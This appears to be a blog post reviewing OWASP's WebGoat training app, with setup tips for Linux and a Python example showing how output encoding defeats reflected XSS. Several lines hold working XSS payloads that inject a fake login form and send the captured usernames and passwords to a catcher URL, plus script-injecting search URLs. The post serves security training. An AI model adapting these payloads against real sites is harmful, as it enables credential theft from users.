OWASP's WebGoat seems like a good way to get some hands-on experience with vulnerabilities, and I must admit that it has been fun so far. Still, I expected something that has been out for so long and is so well recommended to be a bit more polished. The typos are superficial, but it's not like it takes long to run a spell checker. Even the start page could use a word usage check (led vs. lead). A bigger problem lies in incomplete or inaccurate solutions/hints that make it more difficult to complete the lessons without any real gains, other than a reminder that you can't guarantee that everything works everywhere on everything for all time.
I found the CR vs LF note in the HTTP Splitting lesson helpful since I'm playing with it on Linux, but such notes on differences between Windows and Linux early on imply that there will be useful hints on the differences in later lessons, even if the solutions are only given for Windows. This is unfortunately not the case.
On top of centering on Windows, some of the solutions aren't even correct. There are mistakes in URLs, from missing slashes to swapping in "catcher" for "capture". WebGoat does let you know when you've successfully completed something with check marks on the navigation panel, but when things that should be correct don't work on your setup, it can be a bit frustrating to find workarounds. For better or worse, the check-off for the Phishing w/ XSS lesson only checks that the "stolen" information is sent to the right place, not whether it came out of the lesson's page. I triggered that check-off twice, each time pasting perfectly fine code that didn't work in the lesson page into its own HTML page and entering the username/password there. I isolated the problem to the inability to access "document.forms[0].user.value" in the lesson page, but it is currently unclear why that is the case.
A few notes on getting WebGoat V5.3 to work on Firefox on Linux:
- Installation instructions say "Start your browser and browse to: http://localhost/WebGoat/attack. Notice the capital 'W' and 'G'". This didn't work, but I noticed /tomcat/webapps/webgoat didn't have the capitalized W or G, so I started it by going to http://127.0.0.1/webgoat/attack.
- The Getting Started page says, "If you are using WebScarab to test a site that is running the same computer as the browser (i.e. localhost or 127.0.0.1), and you are using IE7, you will need to add a dot "." after the hostname to force IE7 to use the proxy that you have configured." This is also true of Firefox, at least 3.5.8 on Ubuntu 9.10.
- Firebug wouldn't display the contents of a hidden table, but I found the information by digging through the DOM panel.
- Here are a few of the things I tried for Phishing w/ XSS. Again, neither of the first two would work when pasted in the box, but they triggered the check-off when in an HTML page by themselves and the login information was submitted.
- foo<script>function muahahaha(){ alert("User Name = " + document.forms[0].user.value + "; Password = " + document.forms[0].pass.value); XSSImage=new Image(); XSSImage.src="http://localhost/webgoat/catcher?PROPERTY=yes&user=" + document.forms[0].user.value + "&password=" + document.forms[0].pass.value;}</script><form><br><br>login:<br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name="pass"><br><input type="submit" name="login" value="login" onclick="muahahaha()"></form>
- bar<form><br><br>login:<br><br>Enter Username:<br><input type="text" name="user"><br>Enter Password:<br><input type="password" name="pass"><br><input type="submit" name="login" value="login" onclick="var XSSImage=new Image(); XSSImage.src='http://localhost/webgoat/catcher?PROPERTY=yes&user=' + this.form.user.value + '&password=' + this.form.pass.value;"></form>
- Substituting the variables with their values in the URL (http://localhost/webgoat/catcher?PROPERTY=yes&user=guest&password=guest) and pasting that in the box works fine, though that doesn't illustrate the vulnerability.
- An online solution video for the Stage 5 Reflected XSS lesson puts the script in the box, but the instructions for the lesson are to craft a URL to give to someone else. This works for me:
- http://localhost./webgoat/attack?Screen=40&menu=900&search_name=foo<script>alert("Muahahahaha");</script>&action=FindProfile
- http://localhost./webgoat/attack?Screen=40&menu=900&search_name=foo<script>alert("Muahahahaha");</script>
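Both the phishing form and the reflected search_name URL above work for the same reason: the lesson page writes a request parameter back into its HTML without encoding it. The following Python snippet is an added example, not WebGoat's own code, that contrasts that pattern with the fix a defender would apply (HTML entity encoding at the output point). The URL is constructed from the lesson URL above with the hostname normalised; the `render_vulnerable`/`render_hardened` functions and the `<p>No results for ...</p>` template are assumptions standing in for whatever the real lesson page emits.

```python
import html
from urllib.parse import urlsplit, unquote_plus

# Constructed sample: the reflected-XSS URL from the lesson, hostname normalised.
# The payload text is used only to show how the two renderings differ.
SAMPLE_URL = (
    "http://localhost/webgoat/attack?Screen=40&menu=900"
    '&search_name=foo<script>alert("Muahahahaha");</script>&action=FindProfile'
)


def query_param(url: str, key: str) -> str:
    """Return one query parameter the way a naive server would see it.

    Splits on '&' only (so the ';' inside the payload stays part of the value)
    and percent-decodes the result. Returns '' when the key is absent.
    """
    for pair in urlsplit(url).query.split("&"):
        name, _, value = pair.partition("=")
        if name == key:
            return unquote_plus(value)
    return ""


def render_vulnerable(search_name: str) -> str:
    """The pattern the lesson demonstrates: untrusted input concatenated into HTML.

    Whatever the browser sent, including <script> tags, lands in the page verbatim.
    (Hypothetical template; WebGoat's real markup is not reproduced here.)
    """
    return f"<p>No results for {search_name}</p>"


def render_hardened(search_name: str) -> str:
    """Same page with HTML entity encoding applied where the value is written out.

    html.escape with quote=True also neutralises the double quotes, which matters
    when the value is reflected inside an attribute rather than element text.
    """
    return f"<p>No results for {html.escape(search_name, quote=True)}</p>"


def contains_script_tag(markup: str) -> bool:
    """Crude check for the self-test: did a <script tag survive into the output?"""
    return "<script" in markup.lower()


if __name__ == "__main__":
    name = query_param(SAMPLE_URL, "search_name")
    print("parameter as received:", name)
    print("vulnerable rendering:", render_vulnerable(name))
    print("hardened rendering:  ", render_hardened(name))
```

Running it prints the same payload twice: once as live markup, once as `&lt;script&gt;...&lt;/script&gt;` text that the browser displays rather than executes. The encoding has to happen at the output point for the context in question (element text here; attribute, URL and JavaScript contexts each need their own encoder), which is why input filtering alone tends to leave lessons like this one exploitable.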

